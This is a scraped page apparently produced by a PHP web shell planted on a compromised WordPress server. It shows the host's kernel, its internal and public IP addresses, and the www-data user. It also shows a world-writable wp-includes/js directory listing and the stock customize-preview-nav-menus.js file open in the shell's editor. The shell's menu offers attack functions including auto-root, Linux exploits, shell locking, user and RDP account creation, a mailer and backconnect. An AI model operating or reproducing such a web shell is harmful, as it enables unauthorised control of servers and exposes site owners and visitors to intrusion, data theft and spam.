Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.184.207
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ru-website /
wp-includes /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
codemirror
[ DIR ]
drwxrwxrwx
crop
[ DIR ]
drwxrwxrwx
dist
[ DIR ]
drwxrwxrwx
imgareaselect
[ DIR ]
drwxrwxrwx
jcrop
[ DIR ]
drwxrwxrwx
jquery
[ DIR ]
drwxrwxrwx
mediaelement
[ DIR ]
drwxrwxrwx
plupload
[ DIR ]
drwxrwxrwx
swfupload
[ DIR ]
drwxrwxrwx
thickbox
[ DIR ]
drwxrwxrwx
tinymce
[ DIR ]
drwxrwxrwx
.DS_Store
8
KB
-rwxrwxrwx
admin-bar.js
10.51
KB
-rwxrwxrwx
admin-bar.min.js
3.47
KB
-rwxrwxrwx
api-request.js
3.25
KB
-rwxrwxrwx
api-request.min.js
1
KB
-rwxrwxrwx
autosave.js
21.95
KB
-rwxrwxrwx
autosave.min.js
5.69
KB
-rwxrwxrwx
backbone.js
75.97
KB
-rwxrwxrwx
backbone.min.js
23.26
KB
-rwxrwxrwx
clipboard.js
27.81
KB
-rwxrwxrwx
clipboard.min.js
10.36
KB
-rwxrwxrwx
colorpicker.js
28.4
KB
-rwxrwxrwx
colorpicker.min.js
16.17
KB
-rwxrwxrwx
comment-reply.js
12.17
KB
-rwxrwxrwx
comment-reply.min.js
2.91
KB
-rwxrwxrwx
customize-base.js
25.15
KB
-rwxrwxrwx
customize-base.min.js
7.67
KB
-rwxrwxrwx
customize-loader.js
7.72
KB
-rwxrwxrwx
customize-loader.min.js
3.47
KB
-rwxrwxrwx
customize-models.js
6.66
KB
-rwxrwxrwx
customize-models.min.js
3.61
KB
-rwxrwxrwx
customize-preview-nav-menus.js
14.67
KB
-rwxrwxrwx
customize-preview-nav-menus.mi...
4.92
KB
-rwxrwxrwx
customize-preview-widgets.js
22.71
KB
-rwxrwxrwx
customize-preview-widgets.min....
7.64
KB
-rwxrwxrwx
customize-preview.js
27.3
KB
-rwxrwxrwx
customize-preview.min.js
10.51
KB
-rwxrwxrwx
customize-selective-refresh.js
32.55
KB
-rwxrwxrwx
customize-selective-refresh.mi...
10.44
KB
-rwxrwxrwx
customize-views.js
4.95
KB
-rwxrwxrwx
customize-views.min.js
2.39
KB
-rwxrwxrwx
heartbeat.js
22.6
KB
-rwxrwxrwx
heartbeat.min.js
5.74
KB
-rwxrwxrwx
hoverIntent.js
6.93
KB
-rwxrwxrwx
hoverIntent.min.js
1.45
KB
-rwxrwxrwx
hoverintent-js.min.js
1.68
KB
-rwxrwxrwx
imagesloaded.min.js
5.5
KB
-rwxrwxrwx
json2.js
17.99
KB
-rwxrwxrwx
json2.min.js
3.08
KB
-rwxrwxrwx
masonry.min.js
23.57
KB
-rwxrwxrwx
mce-view.js
25.45
KB
-rwxrwxrwx
mce-view.min.js
9.65
KB
-rwxrwxrwx
media-audiovideo.js
26.96
KB
-rwxrwxrwx
media-audiovideo.min.js
12.66
KB
-rwxrwxrwx
media-editor.js
28.44
KB
-rwxrwxrwx
media-editor.min.js
10.65
KB
-rwxrwxrwx
media-grid.js
28.84
KB
-rwxrwxrwx
media-grid.min.js
13.91
KB
-rwxrwxrwx
media-models.js
45.41
KB
-rwxrwxrwx
media-models.min.js
13.96
KB
-rwxrwxrwx
media-views.js
268.05
KB
-rwxrwxrwx
media-views.min.js
108.66
KB
-rwxrwxrwx
quicktags.js
22.07
KB
-rwxrwxrwx
quicktags.min.js
10.87
KB
-rwxrwxrwx
shortcode.js
10.51
KB
-rwxrwxrwx
shortcode.min.js
2.59
KB
-rwxrwxrwx
swfobject.js
9.99
KB
-rwxrwxrwx
tw-sack.js
4.85
KB
-rwxrwxrwx
tw-sack.min.js
3.22
KB
-rwxrwxrwx
twemoji.js
31.21
KB
-rwxrwxrwx
twemoji.min.js
14.9
KB
-rwxrwxrwx
underscore.js
66.77
KB
-rwxrwxrwx
underscore.min.js
18.63
KB
-rwxrwxrwx
utils.js
4.56
KB
-rwxrwxrwx
utils.min.js
1.82
KB
-rwxrwxrwx
wp-ajax-response.js
3.12
KB
-rwxrwxrwx
wp-ajax-response.min.js
2.03
KB
-rwxrwxrwx
wp-api.js
45.88
KB
-rwxrwxrwx
wp-api.min.js
14.34
KB
-rwxrwxrwx
wp-auth-check.js
4.11
KB
-rwxrwxrwx
wp-auth-check.min.js
1.62
KB
-rwxrwxrwx
wp-backbone.js
14.88
KB
-rwxrwxrwx
wp-backbone.min.js
2.97
KB
-rwxrwxrwx
wp-custom-header.js
10.22
KB
-rwxrwxrwx
wp-custom-header.min.js
4.34
KB
-rwxrwxrwx
wp-embed-template.js
6.24
KB
-rwxrwxrwx
wp-embed-template.min.js
3.08
KB
-rwxrwxrwx
wp-embed.js
3.14
KB
-rwxrwxrwx
wp-embed.min.js
1.39
KB
-rwxrwxrwx
wp-emoji-loader.js
6.8
KB
-rwxrwxrwx
wp-emoji-loader.min.js
1.81
KB
-rwxrwxrwx
wp-emoji-release.min.js
17.75
KB
-rwxrwxrwx
wp-emoji.js
8.78
KB
-rwxrwxrwx
wp-emoji.min.js
2.81
KB
-rwxrwxrwx
wp-list-revisions.js
970
B
-rwxrwxrwx
wp-list-revisions.min.js
597
B
-rwxrwxrwx
wp-lists.js
24.72
KB
-rwxrwxrwx
wp-lists.min.js
7.27
KB
-rwxrwxrwx
wp-pointer.js
9.99
KB
-rwxrwxrwx
wp-pointer.min.js
3.54
KB
-rwxrwxrwx
wp-sanitize.js
1.32
KB
-rwxrwxrwx
wp-sanitize.min.js
458
B
-rwxrwxrwx
wp-util.js
4.45
KB
-rwxrwxrwx
wp-util.min.js
1.31
KB
-rwxrwxrwx
wpdialog.js
560
B
-rwxrwxrwx
wpdialog.min.js
272
B
-rwxrwxrwx
wplink.js
20.66
KB
-rwxrwxrwx
wplink.min.js
11.01
KB
-rwxrwxrwx
zxcvbn-async.js
821
B
-rwxrwxrwx
zxcvbn-async.min.js
351
B
-rwxrwxrwx
zxcvbn.min.js
802.97
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customize-preview-nav-menus.js
/** * @output wp-includes/js/customize-preview-nav-menus.js */ /* global _wpCustomizePreviewNavMenusExports */ /** @namespace wp.customize.navMenusPreview */ wp.customize.navMenusPreview = wp.customize.MenusCustomizerPreview = ( function( $, _, wp, api ) { 'use strict'; var self = { data: { navMenuInstanceArgs: {} } }; if ( 'undefined' !== typeof _wpCustomizePreviewNavMenusExports ) { _.extend( self.data, _wpCustomizePreviewNavMenusExports ); } /** * Initialize nav menus preview. */ self.init = function() { var self = this, synced = false; /* * Keep track of whether we synced to determine whether or not bindSettingListener * should also initially fire the listener. This initial firing needs to wait until * after all of the settings have been synced from the pane in order to prevent * an infinite selective fallback-refresh. Note that this sync handler will be * added after the sync handler in customize-preview.js, so it will be triggered * after all of the settings are added. */ api.preview.bind( 'sync', function() { synced = true; } ); if ( api.selectiveRefresh ) { // Listen for changes to settings related to nav menus. api.each( function( setting ) { self.bindSettingListener( setting ); } ); api.bind( 'add', function( setting ) { /* * Handle case where an invalid nav menu item (one for which its associated object has been deleted) * is synced from the controls into the preview. Since invalid nav menu items are filtered out from * being exported to the frontend by the _is_valid_nav_menu_item filter in wp_get_nav_menu_items(), * the customizer controls will have a nav_menu_item setting where the preview will have none, and * this can trigger an infinite fallback refresh when the nav menu item lacks any valid items. */ if ( setting.get() && ! setting.get()._invalid ) { self.bindSettingListener( setting, { fire: synced } ); } } ); api.bind( 'remove', function( setting ) { self.unbindSettingListener( setting ); } ); /* * Ensure that wp_nav_menu() instances nested inside of other partials * will be recognized as being present on the page. */ api.selectiveRefresh.bind( 'render-partials-response', function( response ) { if ( response.nav_menu_instance_args ) { _.extend( self.data.navMenuInstanceArgs, response.nav_menu_instance_args ); } } ); } api.preview.bind( 'active', function() { self.highlightControls(); } ); }; if ( api.selectiveRefresh ) { /** * Partial representing an invocation of wp_nav_menu(). * * @memberOf wp.customize.navMenusPreview * @alias wp.customize.navMenusPreview.NavMenuInstancePartial * * @class * @augments wp.customize.selectiveRefresh.Partial * @since 4.5.0 */ self.NavMenuInstancePartial = api.selectiveRefresh.Partial.extend(/** @lends wp.customize.navMenusPreview.NavMenuInstancePartial.prototype */{ /** * Constructor. * * @since 4.5.0 * @param {string} id - Partial ID. * @param {Object} options * @param {Object} options.params * @param {Object} options.params.navMenuArgs * @param {string} options.params.navMenuArgs.args_hmac * @param {string} [options.params.navMenuArgs.theme_location] * @param {number} [options.params.navMenuArgs.menu] * @param {Object} [options.constructingContainerContext] */ initialize: function( id, options ) { var partial = this, matches, argsHmac; matches = id.match( /^nav_menu_instance\[([0-9a-f]{32})]$/ ); if ( ! matches ) { throw new Error( 'Illegal id for nav_menu_instance partial. The key corresponds with the args HMAC.' ); } argsHmac = matches[1]; options = options || {}; options.params = _.extend( { selector: '[data-customize-partial-id="' + id + '"]', navMenuArgs: options.constructingContainerContext || {}, containerInclusive: true }, options.params || {} ); api.selectiveRefresh.Partial.prototype.initialize.call( partial, id, options ); if ( ! _.isObject( partial.params.navMenuArgs ) ) { throw new Error( 'Missing navMenuArgs' ); } if ( partial.params.navMenuArgs.args_hmac !== argsHmac ) { throw new Error( 'args_hmac mismatch with id' ); } }, /** * Return whether the setting is related to this partial. * * @since 4.5.0 * @param {wp.customize.Value|string} setting - Object or ID. * @param {number|Object|false|null} newValue - New value, or null if the setting was just removed. * @param {number|Object|false|null} oldValue - Old value, or null if the setting was just added. * @return {boolean} */ isRelatedSetting: function( setting, newValue, oldValue ) { var partial = this, navMenuLocationSetting, navMenuId, isNavMenuItemSetting, _newValue, _oldValue, urlParser; if ( _.isString( setting ) ) { setting = api( setting ); } /* * Prevent nav_menu_item changes only containing type_label differences triggering a refresh. * These settings in the preview do not include type_label property, and so if one of these * nav_menu_item settings is dirty, after a refresh the nav menu instance would do a selective * refresh immediately because the setting from the pane would have the type_label whereas * the setting in the preview would not, thus triggering a change event. The following * condition short-circuits this unnecessary selective refresh and also prevents an infinite * loop in the case where a nav_menu_instance partial had done a fallback refresh. * @todo Nav menu item settings should not include a type_label property to begin with. */ isNavMenuItemSetting = /^nav_menu_item\[/.test( setting.id ); if ( isNavMenuItemSetting && _.isObject( newValue ) && _.isObject( oldValue ) ) { _newValue = _.clone( newValue ); _oldValue = _.clone( oldValue ); delete _newValue.type_label; delete _oldValue.type_label; // Normalize URL scheme when parent frame is HTTPS to prevent selective refresh upon initial page load. if ( 'https' === api.preview.scheme.get() ) { urlParser = document.createElement( 'a' ); urlParser.href = _newValue.url; urlParser.protocol = 'https:'; _newValue.url = urlParser.href; urlParser.href = _oldValue.url; urlParser.protocol = 'https:'; _oldValue.url = urlParser.href; } // Prevent original_title differences from causing refreshes if title is present. if ( newValue.title ) { delete _oldValue.original_title; delete _newValue.original_title; } if ( _.isEqual( _oldValue, _newValue ) ) { return false; } } if ( partial.params.navMenuArgs.theme_location ) { if ( 'nav_menu_locations[' + partial.params.navMenuArgs.theme_location + ']' === setting.id ) { return true; } navMenuLocationSetting = api( 'nav_menu_locations[' + partial.params.navMenuArgs.theme_location + ']' ); } navMenuId = partial.params.navMenuArgs.menu; if ( ! navMenuId && navMenuLocationSetting ) { navMenuId = navMenuLocationSetting(); } if ( ! navMenuId ) { return false; } return ( ( 'nav_menu[' + navMenuId + ']' === setting.id ) || ( isNavMenuItemSetting && ( ( newValue && newValue.nav_menu_term_id === navMenuId ) || ( oldValue && oldValue.nav_menu_term_id === navMenuId ) ) ) ); }, /** * Make sure that partial fallback behavior is invoked if there is no associated menu. * * @since 4.5.0 * * @return {Promise} */ refresh: function() { var partial = this, menuId, deferred = $.Deferred(); // Make sure the fallback behavior is invoked when the partial is no longer associated with a menu. if ( _.isNumber( partial.params.navMenuArgs.menu ) ) { menuId = partial.params.navMenuArgs.menu; } else if ( partial.params.navMenuArgs.theme_location && api.has( 'nav_menu_locations[' + partial.params.navMenuArgs.theme_location + ']' ) ) { menuId = api( 'nav_menu_locations[' + partial.params.navMenuArgs.theme_location + ']' ).get(); } if ( ! menuId ) { partial.fallback(); deferred.reject(); return deferred.promise(); } return api.selectiveRefresh.Partial.prototype.refresh.call( partial ); }, /** * Render content. * * @inheritdoc * @param {wp.customize.selectiveRefresh.Placement} placement */ renderContent: function( placement ) { var partial = this, previousContainer = placement.container; // Do fallback behavior to refresh preview if menu is now empty. if ( '' === placement.addedContent ) { placement.partial.fallback(); } if ( api.selectiveRefresh.Partial.prototype.renderContent.call( partial, placement ) ) { // Trigger deprecated event. $( document ).trigger( 'customize-preview-menu-refreshed', [ { instanceNumber: null, // @deprecated wpNavArgs: placement.context, // @deprecated wpNavMenuArgs: placement.context, oldContainer: previousContainer, newContainer: placement.container } ] ); } } }); api.selectiveRefresh.partialConstructor.nav_menu_instance = self.NavMenuInstancePartial; /** * Request full refresh if there are nav menu instances that lack partials which also match the supplied args. * * @param {Object} navMenuInstanceArgs */ self.handleUnplacedNavMenuInstances = function( navMenuInstanceArgs ) { var unplacedNavMenuInstances; unplacedNavMenuInstances = _.filter( _.values( self.data.navMenuInstanceArgs ), function( args ) { return ! api.selectiveRefresh.partial.has( 'nav_menu_instance[' + args.args_hmac + ']' ); } ); if ( _.findWhere( unplacedNavMenuInstances, navMenuInstanceArgs ) ) { api.selectiveRefresh.requestFullRefresh(); return true; } return false; }; /** * Add change listener for a nav_menu[], nav_menu_item[], or nav_menu_locations[] setting. * * @since 4.5.0 * * @param {wp.customize.Value} setting * @param {Object} [options] * @param {boolean} options.fire Whether to invoke the callback after binding. * This is used when a dynamic setting is added. * @return {boolean} Whether the setting was bound. */ self.bindSettingListener = function( setting, options ) { var matches; options = options || {}; matches = setting.id.match( /^nav_menu\[(-?\d+)]$/ ); if ( matches ) { setting._navMenuId = parseInt( matches[1], 10 ); setting.bind( this.onChangeNavMenuSetting ); if ( options.fire ) { this.onChangeNavMenuSetting.call( setting, setting(), false ); } return true; } matches = setting.id.match( /^nav_menu_item\[(-?\d+)]$/ ); if ( matches ) { setting._navMenuItemId = parseInt( matches[1], 10 ); setting.bind( this.onChangeNavMenuItemSetting ); if ( options.fire ) { this.onChangeNavMenuItemSetting.call( setting, setting(), false ); } return true; } matches = setting.id.match( /^nav_menu_locations\[(.+?)]/ ); if ( matches ) { setting._navMenuThemeLocation = matches[1]; setting.bind( this.onChangeNavMenuLocationsSetting ); if ( options.fire ) { this.onChangeNavMenuLocationsSetting.call( setting, setting(), false ); } return true; } return false; }; /** * Remove change listeners for nav_menu[], nav_menu_item[], or nav_menu_locations[] setting. * * @since 4.5.0 * * @param {wp.customize.Value} setting */ self.unbindSettingListener = function( setting ) { setting.unbind( this.onChangeNavMenuSetting ); setting.unbind( this.onChangeNavMenuItemSetting ); setting.unbind( this.onChangeNavMenuLocationsSetting ); }; /** * Handle change for nav_menu[] setting for nav menu instances lacking partials. * * @since 4.5.0 * * @this {wp.customize.Value} */ self.onChangeNavMenuSetting = function() { var setting = this; self.handleUnplacedNavMenuInstances( { menu: setting._navMenuId } ); // Ensure all nav menu instances with a theme_location assigned to this menu are handled. api.each( function( otherSetting ) { if ( ! otherSetting._navMenuThemeLocation ) { return; } if ( setting._navMenuId === otherSetting() ) { self.handleUnplacedNavMenuInstances( { theme_location: otherSetting._navMenuThemeLocation } ); } } ); }; /** * Handle change for nav_menu_item[] setting for nav menu instances lacking partials. * * @since 4.5.0 * * @param {Object} newItem New value for nav_menu_item[] setting. * @param {Object} oldItem Old value for nav_menu_item[] setting. * @this {wp.customize.Value} */ self.onChangeNavMenuItemSetting = function( newItem, oldItem ) { var item = newItem || oldItem, navMenuSetting; navMenuSetting = api( 'nav_menu[' + String( item.nav_menu_term_id ) + ']' ); if ( navMenuSetting ) { self.onChangeNavMenuSetting.call( navMenuSetting ); } }; /** * Handle change for nav_menu_locations[] setting for nav menu instances lacking partials. * * @since 4.5.0 * * @this {wp.customize.Value} */ self.onChangeNavMenuLocationsSetting = function() { var setting = this, hasNavMenuInstance; self.handleUnplacedNavMenuInstances( { theme_location: setting._navMenuThemeLocation } ); // If there are no wp_nav_menu() instances that refer to the theme location, do full refresh. hasNavMenuInstance = !! _.findWhere( _.values( self.data.navMenuInstanceArgs ), { theme_location: setting._navMenuThemeLocation } ); if ( ! hasNavMenuInstance ) { api.selectiveRefresh.requestFullRefresh(); } }; } /** * Connect nav menu items with their corresponding controls in the pane. * * Setup shift-click on nav menu items which are more granular than the nav menu partial itself. * Also this applies even if a nav menu is not partial-refreshable. * * @since 4.5.0 */ self.highlightControls = function() { var selector = '.menu-item'; // Skip adding highlights if not in the customizer preview iframe. if ( ! api.settings.channel ) { return; } // Focus on the menu item control when shift+clicking the menu item. $( document ).on( 'click', selector, function( e ) { var navMenuItemParts; if ( ! e.shiftKey ) { return; } navMenuItemParts = $( this ).attr( 'class' ).match( /(?:^|\s)menu-item-(-?\d+)(?:\s|$)/ ); if ( navMenuItemParts ) { e.preventDefault(); e.stopPropagation(); // Make sure a sub-nav menu item will get focused instead of parent items. api.preview.send( 'focus-nav-menu-item-control', parseInt( navMenuItemParts[1], 10 ) ); } }); }; api.bind( 'preview-ready', function() { self.init(); } ); return self; }( jQuery, _, wp, wp.customize ) );
Close